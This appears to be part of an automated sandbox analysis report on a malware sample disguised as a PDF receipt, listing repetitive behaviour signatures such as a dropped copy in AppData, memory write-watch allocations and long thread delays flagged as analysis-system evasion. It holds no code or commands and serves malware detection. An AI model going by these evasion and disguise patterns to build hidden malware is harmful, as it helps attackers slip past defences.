                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 5830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 6830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 6960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 7960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: B850000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: C850000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: CCE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: DCE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: EFC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: FFC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 10FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 5890000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 6890000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 69C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 79C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: C3B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: C840000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: FB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 2B40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 1130000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599686Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599575Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599467Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599140Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599031Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598922Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598593Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598363Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598243Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596970Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596727Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596614Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595608Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595172Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594843Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594509Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594278Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594160Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594041Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 593812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599891
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599782
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599657
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599047
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598594
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598356
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598110
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597910
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597766
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597652
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597547
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 593954
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7264Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2370Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeWindow / User API: threadDelayed 4332Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeWindow / User API: threadDelayed 5500Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeWindow / User API: threadDelayed 7593
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeWindow / User API: threadDelayed 2229
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599686s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599575s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599467s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598363s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598243s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597124s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596970s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596727s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596614s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595608s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594509s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594278s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594160s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594041s >= -30000sJump to behavior
